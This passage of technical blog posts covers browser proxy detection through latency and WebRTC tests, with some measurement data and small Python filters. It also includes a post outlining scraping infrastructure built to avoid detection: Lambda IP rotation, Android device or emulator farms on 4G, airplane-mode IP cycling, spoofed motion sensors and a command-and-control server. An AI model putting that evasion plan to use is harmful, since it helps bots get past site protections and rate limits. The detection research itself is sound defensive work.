<span class="mf">2017.3</span><span class="p">,</span>
<span class="mf">2017.1</span><span class="p">,</span>
<span class="mf">2017</span>
<span class="p">],</span>
<span class="s2">"167.99.241.135"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">2206.9</span><span class="p">,</span>
<span class="mf">2240.6</span><span class="p">,</span>
<span class="mf">2240.6</span><span class="p">,</span>
<span class="mf">2241</span>
<span class="p">],</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="s2">"0.0.0.0"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">3</span><span class="p">,</span>
<span class="mf">3</span><span class="p">,</span>
<span class="mf">3</span><span class="p">,</span>
<span class="mf">2.9</span>
<span class="p">],</span>
<span class="s2">"127.0.0.1"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">2032.1</span><span class="p">,</span>
<span class="mf">2031.7</span><span class="p">,</span>
<span class="mf">2048.1</span><span class="p">,</span>
<span class="mf">2048.3</span>
<span class="p">],</span>
<span class="s2">"167.99.241.135"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">2272.2</span><span class="p">,</span>
<span class="mf">2329.2</span><span class="p">,</span>
<span class="mf">2329.9</span><span class="p">,</span>
<span class="mf">2330.2</span>
<span class="p">],</span>
</code></pre></div>
<p>And absolute rubbish such as:</p>
<div class="highlight"><pre><span></span><code><span class="s2">"0.0.0.0"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">393.2</span><span class="p">,</span>
<span class="mf">413.6</span><span class="p">,</span>
<span class="mf">2472.2</span><span class="p">,</span>
<span class="mf">2876.9</span>
<span class="p">],</span>
<span class="s2">"127.0.0.1"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">2048</span><span class="p">,</span>
<span class="mf">2047.9</span><span class="p">,</span>
<span class="mf">2048.6</span><span class="p">,</span>
<span class="mf">2048.5</span>
<span class="p">],</span>
<span class="s2">"167.99.241.135"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">396.6</span><span class="p">,</span>
<span class="mf">4074</span><span class="p">,</span>
<span class="mf">4468.9</span><span class="p">,</span>
<span class="mf">7171.9</span>
<span class="p">],</span>
</code></pre></div>
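<p>One way to keep such samples out of any later analysis is a simple plausibility filter. The following is only a minimal sketch: the two thresholds and the function name <code>is_rubbish</code> are my own assumptions for illustration, not values derived from the measurements. It rejects a sample if the loopback latency is implausibly high or if a single series is wildly inconsistent with itself.</p>

```python
from statistics import median

# Assumed thresholds (not taken from the article); tune them on real data.
MAX_LOOPBACK_MS = 100.0  # a loopback probe should normally finish far below this
MAX_SPREAD_RATIO = 2.0   # max/min within one series above this counts as unstable


def is_rubbish(sample):
    """Return True if a latency sample looks unusable.

    `sample` maps a probed address to a list of latencies in milliseconds,
    in the same shape as the measurements shown in this article.
    """
    # Rule 1: the loopback latency itself is implausibly high.
    if median(sample["127.0.0.1"]) > MAX_LOOPBACK_MS:
        return True
    # Rule 2: one of the series is wildly inconsistent with itself.
    for latencies in sample.values():
        if min(latencies) > 0 and max(latencies) / min(latencies) > MAX_SPREAD_RATIO:
            return True
    return False


# Values copied from two of the measurements in this article.
plausible = {
    "0.0.0.0": [138.2, 138.5, 143.1, 143.3],
    "127.0.0.1": [3.6, 3.9, 3.9, 3.9],
    "167.99.241.135": [144, 144.2, 144.3, 145.2],
}
rubbish = {
    "0.0.0.0": [393.2, 413.6, 2472.2, 2876.9],
    "127.0.0.1": [2048, 2047.9, 2048.6, 2048.5],
    "167.99.241.135": [396.6, 4074, 4468.9, 7171.9],
}

print(is_rubbish(plausible))  # False
print(is_rubbish(rubbish))    # True
```

<p>A filter like this does not explain where the huge latencies come from. It only prevents them from polluting a classification step.</p>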
<h4>Somewhat Rubbish Data</h4>
<p>And then there are cases where I just don't know what to say.</p>
<p>I am quite confident that this latency measurement is from a browser that uses a proxy (Again, mostly because of <a href="https://incolumitas.com/2021/10/16/7-different-ways-to-detect-proxies/">other proxy detection tests</a>):</p>
<div class="highlight"><pre><span></span><code><span class="s2">"0.0.0.0"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">95.2</span><span class="p">,</span>
<span class="mf">95.2</span><span class="p">,</span>
<span class="mf">95.5</span><span class="p">,</span>
<span class="mf">96.3</span>
<span class="p">],</span>
<span class="s2">"127.0.0.1"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">2031.7</span><span class="p">,</span>
<span class="mf">2047.3</span><span class="p">,</span>
<span class="mf">2048</span><span class="p">,</span>
<span class="mf">2047.8</span>
<span class="p">],</span>
<span class="s2">"167.99.241.135"</span><span class="o">:</span> <span class="p">[</span>
<span class="mf">182.4</span><span class="p">,</span>
<span class="mf">182.9</span><span class="p">,</span>
<span class="mf">183.6</span><span class="p">,</span>
<span class="mf">183</span>
<span class="p">],</span>
</code></pre></div>
<p>The <code>0.0.0.0</code> latencies are too large and in a similar range as the <code>167.99.241.135</code> latencies. But the <code>127.0.0.1</code> latencies are just unreasonably huge?! Like WTF?</p>
<h2>Help Needed</h2>
<p>Do you think my suggested method to detect proxies works? I need your help!</p>
<p>Why are latencies to <code>0.0.0.0</code> significantly larger than latencies to <code>127.0.0.1</code> when using a SOCKS / HTTP proxy?</p>
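<p>Until that question is answered, the observation itself can at least be written down as a rule of thumb. The sketch below is not a validated detector: the ratio of 10 and the function name <code>proxy_suspected</code> are assumptions I picked for illustration. It flags a sample when the median <code>0.0.0.0</code> latency is many times larger than the median <code>127.0.0.1</code> latency.</p>

```python
from statistics import median

# Assumed cut-off, not taken from the article: how many times larger the
# 0.0.0.0 median must be than the 127.0.0.1 median to raise suspicion.
SUSPICIOUS_RATIO = 10.0


def proxy_suspected(sample, ratio=SUSPICIOUS_RATIO):
    """Flag a sample if requests to 0.0.0.0 are much slower than to 127.0.0.1."""
    zero = median(sample["0.0.0.0"])
    loopback = median(sample["127.0.0.1"])
    return zero > ratio * loopback


# Values copied from one of the measurements in this article.
sample = {
    "0.0.0.0": [138.8, 143.5, 144, 144.4],
    "127.0.0.1": [3.6, 3.8, 3.8, 3.9],
    "167.99.241.135": [137.8, 142.8, 143.6, 145.1],
}

print(proxy_suspected(sample))  # True
```

<p>Samples with implausible loopback latencies would have to be discarded before applying such a rule, otherwise the ratio is meaningless.</p>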
<p>Maybe because the browser routes requests to <code>0.0.0.0</code> to the upstream proxy, but not requests to <code>127.0.0.1</code>? The only way to find out would be to take a look at the Chrome proxy implementation, which is used when Chrome is invoked with a proxy flag such as <code>chromium-browser --proxy-server=http://localhost:8947</code>.</p>So you want to Scrape like the Big Boys? 🚀2021-11-03T23:48:00+01:002021-11-04T10:30:00+01:00Nikolai Tschachertag:incolumitas.com,2021-11-03:/2021/11/03/so-you-want-to-scrape-like-the-big-boys/<p>What it really takes to scrape without getting detected.</p><h2>Intro</h2>
<p>Let's do some thinking, shall we?</p>
<p>When I used to run a scraping service, I managed to scrape at most a couple of million Google SERPs per week. But I never ever purchased proxies from proxy providers such as <a href="https://brightdata.com/">Brightdata</a>, <a href="https://packetstream.io/">Packetstream</a> or <a href="https://oxylabs.io/">Oxylabs</a>.</p>
<p>Why? </p>
<p>Because I could not fully trust the other customers with whom I shared the proxy bandwidth. What if I share proxy servers with criminals that do more malicious stuff than the somewhat innocent SERP scraping?</p>
<p>Full disclosure: Non-DoS scraping of public information is okay for me. Ad fraud, social media spam and web attacks such as automated SQL injections or XSS are not.</p>
<p>Furthermore, those proxy services are quite <em>pricey</em>, and me being a stingy German, I could not see a reasonable way for this combination to work out.</p>
<figure>
<img src="https://incolumitas.com/images/work different.png" alt="farm man" />
<figcaption>It had to be said.</figcaption>
</figure>
<p>So how did I manage to scrape millions of Google SERPs?</p>
<p>I used <a href="https://aws.amazon.com/lambda/">AWS Lambda</a>, put Headless Chrome into an <a href="https://aws.amazon.com/getting-started/hands-on/run-serverless-code/">AWS Lambda function</a> and used <a href="https://github.com/berstend/puppeteer-extra">puppeteer-extra</a> and <a href="https://github.com/alixaxel/chrome-aws-lambda">chrome-aws-lambda</a> to create a function that automatically launches a browser for 300 seconds that I can solely use for scraping.</p>
<p>Actually, I could have probably achieved the same with plain <code>curl</code>, because Google really doesn't put too much effort into blocking bots from their own search engine (they mostly rate limit by IP). But I needed a full browser for other projects, so there was that.</p>
<p>Anyhow, AWS gives you access to 16 regions all around the world (are they offering even more regions in the meantime?) and after three AWS Lambda function invocations, your function obtains a new public IP address. And if you concurrently invoke 1000 Lambda functions, you will bottom out at around 250 public IP addresses. And then you have 16 regions, which gives you around <code>16 * 250 = 4000</code> public IP addresses at any time when using AWS Lambda. This was enough to be able to scrape millions of Google SERPs / week, even when sharing public datacenter IP addresses.</p>
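<p>The back-of-the-envelope calculation above can be written down as a small sketch. The function names are mine, and the weekly volume of 2,000,000 is only an illustrative stand-in for "a couple of million", not a measured number.</p>

```python
def lambda_ip_pool(regions, ips_per_region):
    """Approximate number of distinct public IPs reachable at one time."""
    return regions * ips_per_region


def requests_per_ip_per_day(weekly_requests, pool_size):
    """Average daily load per IP if requests are spread evenly over the pool."""
    return weekly_requests / 7 / pool_size


pool = lambda_ip_pool(regions=16, ips_per_region=250)
print(pool)  # 4000

# 2,000,000 is an illustrative stand-in for "a couple of million" per week.
print(round(requests_per_ip_per_day(2_000_000, pool), 1))  # 71.4
```

<p>Under these assumptions, each IP address only has to carry a few dozen requests per day, which helps explain why per-IP rate limiting did not get in the way.</p>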
<p>I tried the same with <a href="https://cloud.google.com/">Google Cloud Platform</a>, but funnily enough, Google blocks their own cloud infrastructure much more aggressively compared to traffic from AWS.</p>
<p>(This was all in 2019 and 2020; things may have changed since.)</p>
<p><strong>But I digress.</strong></p>
<p>The above setup is not good. It will work for scraping Google / Bing / Amazon, because they <em>want</em> to be scraped to a certain extent.</p>
<p>But it will never work against well-protected websites that employ protection from anti bot companies such as <a href="https://datadome.co/">DataDome</a>, <a href="https://www.akamai.com/">Akamai</a> or <a href="https://www.imperva.com/">Imperva</a> (there are more anti bot companies, don't be salty if I didn't name you, okay?).</p>
<p>Those companies employ ill-adjusted individuals that do nothing but look for the most recent techniques to fingerprint browsers, find out if a browser <a href="https://github.com/abrahamjuliot/creepjs">lies about its own configuration</a> or exhibits artifacts that don't pertain to a human-controlled browser. When normal people are out drinking beers in the pub on Friday night, these individuals invent increasingly bizarre ways to fingerprint browsers and detect bots ;)</p>
<ol>
<li><a href="https://www.usenix.org/system/files/conference/woot14/woot14-ho.pdf">Browser Red Pills - Dan Boneh - Awesome Paper</a> </li>
<li><a href="https://incolumitas.com/2021/01/10/browser-based-port-scanning/">Browser Based Port Scanning</a></li>
<li><a href="https://research.google/pubs/pub45581/">Google Picasso</a></li>
<li><a href="https://browserleaks.com/fonts">Font Fingerprinting</a></li>
<li><a href="https://github.com/NikolaiT/zardaxt">TCP/IP Fingerprinting - zardaxt.py</a></li>
<li><a href="https://en.wikipedia.org/wiki/Proof_of_work">Browser based Crypto Challenges - Proof of Work</a></li>
<li>Generic Browser Fingerprinting</li>
<li><a href="https://github.com/salesforce/ja3">TLS Fingerprinting</a></li>
<li>WebGL Fingerprinting</li>
<li>WebRTC real IP detection</li>
<li><a href="https://incolumitas.com/2021/04/11/bot-detection-with-behavioral-analysis/">Behavioral Classification</a></li>
<li><a href="https://incolumitas.com/2021/02/05/why-does-this-website-know-i-am-sitting-on-the-toilet/">Gyroscope API querying (device movement / rotation detection)</a></li>
<li><a href="https://fingerprintjs.com/blog/disabling-javascript-wont-stop-fingerprinting/">Fingerprinting without JavaScript using HTTP headers, CSS feature queries and Fonts.</a></li>
<li>...</li>
</ol>
<p>I kid you not, there are millions of different ways to detect if a browser is being controlled by a bot or not. It's insanely complex and almost all bot architectures are to a degree vulnerable to detection.</p>
<p>Maybe I am just not a good enough bot developer myself, but I think it's harder to create a good bot than to detect a bot. The real problem for anti bot companies is to reduce the false positive rate, not to detect most bots.</p>
<p>The main reason that makes bots prone to detection is simple economics: In order to scrape millions of pages, bot programmers put their browsers into Docker containers and orchestrate them with Docker Swarm. Others use Kubernetes to orchestrate scraping clusters. And of course they will use cloud providers such as Hetzner, AWS or DigitalOcean to host their bots. Nobody uses their MacBook Pro to run 20 Chrome Docker images overnight.</p>
<p>The above described architecture is highly non-humanlike. What sane human being is browsing Instagram from within a docker container on a Hetzner VPS?!</p>
<p>Let's propose a scraping architecture that is not that easily detectable.</p>
<h2>An undetectable and scalable scraping infrastructure</h2>
<p>First let's proclaim the two laws of successful scraping: </p>
<ol>
<li>The second most important rule about evading anti bot companies is: <strong>You shall not lie about your browser configuration</strong>.</li>
<li>And the most important rule is: <strong>You shall only lie about your browser configuration if nobody catches you</strong>.</li>
</ol>
<p>Because I am not that good at reverse engineering those <a href="https://incolumitas.com/data/imperva.js">heavily obfuscated fingerprinting libraries</a> from anti bot companies, my suggestion is to just use real devices for scraping.</p>
<figure>
<img src="https://incolumitas.com/images/shelf_closeup_790x.jpg" alt="phones man" />
<figcaption>Device Farm (Source: https://github.com/DeviceFarmer/stf)</figcaption>
</figure>
<p>If I were to create an <em>undetectable</em> scraping service, I would probably buy 500 <a href="https://www.zdnet.com/article/best-phone-under-100/">cheap Android devices</a> (starting at $58 per device), maybe from 5 different manufacturers. We want diversity after all for fingerprinting reasons! You can also buy old (but more powerful) Android devices. If you buy 100 devices at once, you'll get a massive discount.</p>
<p>Then I would buy cheap data plans for the devices, control them with <a href="https://github.com/DeviceFarmer/stf">DeviceFarmer/stf</a> and rent some cheap storage space (with a cellular antenna close by) in five major cities of the world such as London, Paris, Boston, Frankfurt and Los Angeles, and put 100 phones into each of them.</p>
<p>Then I would install the lightweight Android Go on each device, throw out everything unnecessary that bloats the device and plug it into a power source. Every 5 minutes I would toggle airplane mode on and off so that the phone gets a new IP address from the <a href="https://en.wikipedia.org/wiki/Carrier-grade_NAT">4G carrier grade NAT</a>.</p>
<p>Mobile IP addresses (4G, 5G, LTE) are practically un-bannable, because they are shared by up to hundreds of thousands of legitimate users in major cities. Instagram will never dare to ban 200,000 people in LA just because some pesky spammers use the same IP! When Carrier Grade NATs were designed, <a href="https://www.ofcom.org.uk/__data/assets/pdf_file/0020/37802/cgnat.pdf">the designers knew about this issue</a>:</p>
<blockquote>
<p>In the event that an IPv4 address is blocked or blacklisted as a source of spam, the impact on a
CGN would be greater, potentially affecting an entire subscriber base. This would increase cost
and support load for the ISP, and, as we have seen earlier, damage its IP reputation.</p>
</blockquote>
<p>Do you think IPv6 comes to the rescue? Think again! Most anti bot companies give little to no IP reputation to IPv6 addresses, because the address space is so insanely vast.</p>
<p>One problem with the setup described above is that I will need to spoof those pesky <code>deviceorientation</code> and <code>devicemotion</code> <a href="https://developer.mozilla.org/en-US/docs/Web/Events/Detecting_device_orientation">JavaScript events</a> on a kernel level, because no real device is lying on the ground without rotation/movement all day long. Every website can access rotation and velocity data from Android devices without asking for permission. So we have to spoof that.</p>
<p>But apart from that, I cannot see a way how bot detection systems are going to block this scraping infrastructure.</p>
<p>Of course the downsides are apparent: </p>
<ol>
<li>I have to buy 500 Android devices. I already own three of those things; I would go ballistic with 500 of them.</li>
<li>I need to rent storage space in major cities. That's expensive.</li>
<li>I need people in 5 cities to fix problems in the device farms.</li>
<li>I have to deal with hardware. I hate that. It causes problems non stop.</li>
</ol>
<p>So that would be a larger project, probably costing thousands of dollars in maintenance.</p>
<h3>Improvement: Emulate Android</h3>
<p>Instead of buying real Android devices, it would be better to emulate Android devices with Android emulators such as:</p>
<ul>
<li><a href="https://www.android-x86.org/documentation/virtualbox.html">Android-x86 on VirtualBox</a></li>
<li><a href="https://www.bluestacks.com/de/index.html">bluestacks</a></li>
<li>Or the <a href="https://developer.android.com/studio/run/emulator">Android Studio Emulator</a></li>
</ul>
<p>Obviously, here we play with the devil again because we want to cut costs!</p>
<p>How are those pesky anti bot companies going to find out that we are emulating Android devices?</p>
<ol>
<li>An idea is to use browser based red pills that reveal that the browser is running in an emulated environment</li>
<li>Maybe they will launch <a href="https://incolumitas.com/2021/01/10/browser-based-port-scanning/">browser based port scans</a> against well known ports that are only running on emulated Android devices (such as <code>adb</code> service)?</li>
<li>Maybe Google sets some device-wide <a href="https://support.google.com/googleplay/android-developer/answer/6048248?hl=en">advertising IDs</a> on each mobile device? If this ID is missing or always stays the same, it could be a reason for suspicion.</li>
<li>Every website can find out whether you are logged into a Gmail or YouTube account with <a href="https://browserleaks.com/social">Social Media Login Detection</a>. No logged in Google account on Android equals suspicion!</li>
<li>There are probably 1000 more techniques that can be used to detect emulated Android devices</li>
</ol>
<p>Most likely, the Android emulators are imperfect and this imperfection is exhibited over the massive JavaScript API that each mobile browser offers to every website.</p>
<p>I am absolutely in favour of the emulation approach. This would mean that we only have to own several powerful servers, plug <a href="https://proxidize.com/">4G dongles into them</a> and we are ready to go. It could look like this (The image is taken from <a href="https://proxidize.com/">proxidize.com</a>): </p>
<figure>
<img src="https://incolumitas.com/images/MicrosoftTeams-image-33.png.webp" alt="phones man" />
<figcaption>A couple of 4G dongles that I use for my personal E-Mail checking and writing Whatsapp messages (Source: https://proxidize.com/gallery/)</figcaption>
</figure>
<p><a href="https://proxidize.com/">proxidize.com</a> offers 4G mobile proxies. I don't want proxies, because <a href="https://bot.incolumitas.com/proxy_detect.html">proxies are detectable in themselves</a>. I want to directly use the 4G dongle from the Android emulator! That way, there is no added latency caused by geographical distance between the Android emulator and a proxy.</p>
<p>So in the end, the scraping infrastructure could look like this:</p>
<ol>
<li>Install one powerful scraping server with 50 4G dongles connected to it in one geographical location</li>
<li>For each scraping server, run 50-100 emulated Android devices.</li>
<li>Put this scraping station in 5 major cities.</li>
<li>A simple command & control server orchestrates the 5 scraping stations.</li>
<li>Profit.</li>
</ol>7 different ways to detect Proxies2021-10-16T12:46:00+02:002021-10-25T18:46:00+02:00Nikolai Tschachertag:incolumitas.com,2021-10-16:/2021/10/16/7-different-ways-to-detect-proxies/<p>In this blog post, I demonstrate 7 different efficient ways how to detect a proxy server when the client is visiting a web server with a browser that has a proxy / VPN configured.</p><p><a
class="orange_button"
href="https://bot.incolumitas.com/proxy_detect.html">
Visit the Proxy/VPN Detection Page
</a></p>
<h2>Introduction</h2>
<p>In the past couple of months, I have been writing a lot about bot detection and proxy detection.</p>
<p>For example, I wrote a blog article about <a href="https://incolumitas.com/2021/06/07/detecting-proxies-and-vpn-with-latencies/">proxy detection using latency measurements</a> that leverages two different latency measurements, one taken with WebSocket messages from the browser, the other looking at the latencies of the incoming three-way TCP/IP handshake on the server side. The rough idea is: If the medians of the two measurements differ significantly, there could be a proxy sitting between the browser and the web server.</p>
<p>But why is proxy detection important in IT security and bot detection? In order to understand that, it's important to see why your IP address bears so much weight in bot detection:</p>
<ol>
<li>The IP address is the unique piece of entropy that tells your communication partners where they have to send their packets in order to speak to you.</li>
<li>Usually, your ISP assigns an IP address to you. It doesn't matter if you are using a home modem/router or a mobile phone with a SIM card that grants you access to a mobile carrier network. In the end, your ISP connects you to the Internet and your host will be identified uniquely by your IP address. Your ISP knows at any moment in time which customer (by your name, address and passport copy that you provided upon registration) is associated to which IP address.</li>
<li>The basic assumption web services can make about a private customer's IP address is that a relatively small group of end users use the same IP address. However, this is not necessarily the case with mobile 3G or 4G <a href="https://en.wikipedia.org/wiki/Carrier-grade_NAT">Carrier-grade NATs</a>.</li>
<li>A very important security property of IP addresses is that they are <a href="https://en.wikipedia.org/wiki/IP_address_spoofing">hard to spoof</a>: While there is no technical limitation that prevents you from changing the source address of your IP packets, <em>smart</em> routers and Intrusion Detection Systems (IDS) on the routing path will drop spoofed packets by using methods such as <a href="https://en.wikipedia.org/wiki/Ingress_filtering">ingress</a> or <a href="https://en.wikipedia.org/wiki/Egress_filtering">egress</a> filtering. Furthermore, the TCP three-way handshake won't even work with hosts that spoof source IP addresses, because the SYN+ACK reply is sent to the spoofed address and never reaches the sender.</li>
<li>All the above properties give web service providers some confidence that IP addresses are usually shared by a relatively small group of people and that real human beings will not send more network packets than a certain threshold. Put differently: You can stop bots by counting how many requests per time period you received from a certain IP address. If an IP address exceeds that threshold, you rate limit them or serve them a CAPTCHA.</li>
</ol>
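<p>The request counting described in the last point can be sketched as a sliding window counter per IP address. This is a minimal in-memory illustration, not how any particular web service implements it. The class name, the limit of 3 requests and the 60 second window are assumptions, and the IP addresses come from the reserved documentation ranges.</p>

```python
from collections import defaultdict, deque


class SlidingWindowLimiter:
    """Allow at most `max_requests` per IP within `window_seconds`."""

    def __init__(self, max_requests, window_seconds):
        self.max_requests = max_requests
        self.window_seconds = window_seconds
        self._hits = defaultdict(deque)  # ip -> timestamps of recent requests

    def allow(self, ip, now):
        """Record a request at time `now` (seconds) and say if it is allowed."""
        hits = self._hits[ip]
        # Forget requests that have fallen out of the time window.
        while hits and now - hits[0] >= self.window_seconds:
            hits.popleft()
        if len(hits) >= self.max_requests:
            return False  # over the threshold: rate limit or serve a CAPTCHA
        hits.append(now)
        return True


limiter = SlidingWindowLimiter(max_requests=3, window_seconds=60)
print([limiter.allow("203.0.113.7", t) for t in (0, 1, 2, 3)])
# [True, True, True, False]
print(limiter.allow("203.0.113.7", 61))   # True, the oldest requests expired
print(limiter.allow("198.51.100.9", 3))   # True, other IPs are counted separately
```

<p>Passing the timestamp in explicitly keeps the sketch deterministic. A real deployment would use a monotonic clock and a shared store instead of process memory.</p>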
<figure>
<img src="https://incolumitas.com/images/IPv4_Packet-en.svg.png" alt="IPv4_Packet" />
<figcaption>The IPv4 packet header, because it's so beautiful
<span style="font-size: 70%">(Source: <a href="https://en.wikipedia.org/wiki/IPv4#Header">https://en.wikipedia.org/wiki/IPv4#Header</a>)</span>
</figcaption>
</figure>
<h2>The Attacker Model</h2>
<p>The basic scenario is as follows: A scraper developed a bot and tries to scrape many pages of a huge website. Because the website is programmed in React, the scraper decided to use a real browser for his scraping endeavours instead of relying on <code>curl</code>.</p>
<p>All proxy detection tests in this blog article assume that the client is using the most recent Chrome browser with an HTTP/S or SOCKS proxy configured. You can achieve that by starting Chrome with the following shell command: <code>google-chrome --proxy-server="socks5://localhost:1080"</code> whereby <code>socks5://localhost:1080</code> could be any proxy server.</p>
<p>Furthermore, it is assumed that the Chrome browser comes configured as is, without any plugins or extensions active. JavaScript is enabled by default, as it should be.</p>
<p>The attacker model is as follows: The attacker has full control over a web server and lures the client into visiting the attacker's website (the proxy detection site), which will run the tests specified in this blog article.</p>
<p>Some of the tests rely upon JavaScript execution and transferring information back to the attacker's website by means such as the WebSocket or <a href="https://developer.mozilla.org/en-US/docs/Web/API/Navigator/sendBeacon">Navigator.sendBeacon()</a> JavaScript APIs.</p>
<p>Of course, the client is able to alter and spoof any JavaScript logic, so if a proxy detection test relies exclusively on JavaScript / client side logic, it will be marked as such. This client side spoofing is often made harder by <a href="https://github.com/javascript-obfuscator/javascript-obfuscator">obfuscating and compressing JavaScript</a>.</p>
<p>Furthermore, time also plays a crucial role. If a detection test gives a result immediately, before even serving the <code>index.html</code> file, it's easier to put a stop to scraping. But some tests rely on complicated JavaScript logic that runs long after the web page has been served, which means that the scraper can be blocked only on subsequent requests to the website.</p>
<h2>General Notes for all Detection Tests</h2>
<p>I will not show source code for all the proxy detection tests in this blog article. Rather, I will link to my older blog articles in which I often provide the implementation. Where applicable, I will provide a link to GitHub projects with source code.</p>
<p>All proxy detection tests can be found on the following dedicated web site: </p>
<p><a
class="orange_button"
href="https://bot.incolumitas.com/proxy_detect.html">
Visit the Proxy/VPN Detection Page
</a></p>
<p>You can look at the source code of the client side proxy detection test when inspecting the page source code. </p>
<h2>1. Latency Test</h2>
<table>
<thead>
<tr>
<th>Test Property</th>
<th>Test Property Value</th>
</tr>
</thead>
<tbody>
<tr>
<td><em>Description</em></td>
<td>Compare latency from browser to server with the latency from web server to external IP address</td>
</tr>
<tr>
<td><em>Spoofable?</em></td>
<td>Yes, the latency measurements from browser to server are obtained with JavaScript and can be manipulated by the client.</td>
</tr>
<tr>
<td><em>Results Availability</em></td>
<td>~500 ms after <code>DOMContentLoaded</code></td>
</tr>
<tr>
<td><em>Accuracy</em></td>
<td>Depends on the geographical location of the proxy and its latency.</td>
</tr>
</tbody>
</table>
<p>I created an in-depth description of the basic idea of this bot detection test in <a href="https://incolumitas.com/2021/06/07/detecting-proxies-and-vpn-with-latencies/">an earlier blog article</a>. The idea is to take two independent latency measurements:</p>
<ol>
<li><strong>Browser to Server Latency:</strong> Send <code>N=10</code> WebSocket messages from the browser to the web server. The web server immediately replies to each message with the same message (basic echo server). The browser stores the time delta as latency measurement.</li>
<li><strong>Server to Browser Latency:</strong> On the server, when the browser establishes an HTTP connection, we measure the time delta in the initial three-way TCP/IP handshake between SYN, SYN+ACK and ACK packets.</li>
</ol>
<p>If both latency measurements differ significantly (namely the <strong>Browser to Server Latency</strong> is significantly higher than the <strong>Server to Browser Latency</strong>), it is possible to conjecture that there is an intermediate host between the browser and the web server.</p>
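<p>The comparison can be sketched as follows. This is a simplified illustration and not the code running on the detection page: the function names, the threshold of 30 ms and the example latencies are all assumptions made up for this sketch.</p>

```python
from statistics import median


def latency_gap_ms(websocket_rtts_ms, tcp_handshake_rtts_ms):
    """Median browser-to-server latency minus median server-to-browser latency."""
    return median(websocket_rtts_ms) - median(tcp_handshake_rtts_ms)


def latency_test_flags_proxy(websocket_rtts_ms, tcp_handshake_rtts_ms, min_gap_ms=30.0):
    """Flag the client if the browser-side latency is significantly higher.

    `min_gap_ms` is an assumed threshold and would need tuning on real traffic.
    """
    return latency_gap_ms(websocket_rtts_ms, tcp_handshake_rtts_ms) > min_gap_ms


# Made-up example values in milliseconds.
proxied_ws = [118.0, 121.5, 119.2, 120.1, 122.3]  # WebSocket echo round trips
proxied_tcp = [21.4]                              # one handshake per connection
direct_ws = [23.0, 24.1, 22.8]
direct_tcp = [21.4]

print(round(latency_gap_ms(proxied_ws, proxied_tcp), 1))  # 98.7
print(latency_test_flags_proxy(proxied_ws, proxied_tcp))  # True
print(latency_test_flags_proxy(direct_ws, direct_tcp))    # False
```

<p>Using the median rather than the mean makes the comparison less sensitive to a single delayed WebSocket message.</p>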
<p>The intermediate proxy server has only one purpose: It splits the TCP/IP connection between client and web-server into two separate TCP/IP connections, so that the web server only sees the source IP address of the proxy server!</p>
<ol>
<li>TCP/IP connection 1, from browser to proxy server</li>
<li>TCP/IP connection 2, from proxy server to web server</li>
</ol>
<p>Because this detour over the proxy server often incurs a geographical and application level delay, we are able to observe a difference in latencies!</p>
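<p>A toy model makes the source of that difference explicit. The numbers and function names below are invented for illustration. The point is only that the WebSocket echo measured in the browser travels over both TCP/IP connections, whereas the handshake measured on the web server covers connection 2 alone.</p>

```python
def websocket_rtt_ms(client_proxy_rtt, proxy_server_rtt, proxy_overhead):
    """Echo round trip seen by the browser: both legs plus proxy processing."""
    return client_proxy_rtt + proxy_server_rtt + proxy_overhead


def tcp_handshake_rtt_ms(proxy_server_rtt):
    """Handshake round trip seen by the web server: only the proxy-to-server leg."""
    return proxy_server_rtt


# Made-up example: browser to proxy 40 ms, proxy to web server 20 ms,
# and 2 ms of processing inside the proxy.
browser_side = websocket_rtt_ms(40.0, 20.0, 2.0)
server_side = tcp_handshake_rtt_ms(20.0)
print(browser_side, server_side, browser_side - server_side)  # 62.0 20.0 42.0

# Without a proxy there is no first leg and no proxy overhead,
# so both measurements agree in this model.
print(websocket_rtt_ms(0.0, 20.0, 0.0) - tcp_handshake_rtt_ms(20.0))  # 0.0
```

<p>In this model the gap equals the latency of connection 1 plus the processing time in the proxy. That is why a proxy located close to the client is much harder to spot with this test.</p>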
<p>The application level delay is non-negligible: On its normal routing path, an IP packet only has to pass several extremely high-speed IP-layer industrial routers that are built on top of purpose-built routing hardware. A proxy server such as <a href="https://github.com/3proxy/3proxy">3proxy</a>, however, usually runs on an off-the-shelf Linux server, and the IP packet has to be passed through the Linux TCP/IP stack all the way up to user land, where the proxy server establishes a new TCP/IP connection with the web server. This takes some milliseconds, including at least one additional round trip between proxy and web server for the new three-way TCP/IP handshake.</p>
<p>Large proxy providers may optimize the geo-latency and they probably have super fast proxy servers, but they still need to glue the two TCP/IP connections together so that it appears to the web server as if it is talking directly to the client. This will always cost some time.</p>
<p>There are a lot of things that can distort the timing measurements: network congestion, unexpected networking issues on the client side and many other factors. On the plus side, it's possible to detect those issues with JavaScript as well.</p>
<h2>2. WebRTC Test</h2>
<table>
<thead>
<tr>
<th>Test Property</th>
<th>Test Property Value</th>
</tr>
</thead>
<tbody>
<tr>
<td><em>Description</em></td>
<td>Check if WebRTC leaks the real IP address</td>
</tr>
<tr>
<td><em>Spoofable?</em></td>
<td>Yes, obtaining the real IP address via WebRTC requires JavaScript</td>
</tr>
<tr>
<td><em>Results Availability</em></td>
<td>~200 ms after <code>DOMContentLoaded</code></td>
</tr>
<tr>
<td><em>Accuracy</em></td>
<td>100%</td>
</tr>
</tbody>
</table>
<p><a href="https://webrtchacks.com/so-your-vpn-is-leaking-because-of-webrtc/">WebRTC for proxy detection</a> is an older technique, but still very relevant. <a href="https://en.wikipedia.org/wiki/WebRTC">WebRTC</a> (Web Real-Time Communication) is a technique that allows direct peer-to-peer communication in browsers over UDP. It is intended to enable direct audio and video communication between peers. </p>
<p>Because direct peer-to-peer communication is possible, there must be a way to detect the public and internal IP addresses of the peers. This is made possible by the so-called <a href="https://developer.mozilla.org/en-US/docs/Web/API/WebRTC_API/Protocols">STUN protocol</a>.</p>
<blockquote>
<p>Session Traversal Utilities for NAT (STUN) (acronym within an acronym) is a protocol to discover your public address and determine any restrictions in your router that would prevent a direct connection with a peer. The client will send a request to a STUN server on the Internet who will reply with the client’s public address and whether or not the client is accessible behind the router’s NAT. (<a href="https://developer.mozilla.org/en-US/docs/Web/API/WebRTC_API/Protocols">Source</a>)</p>
</blockquote>
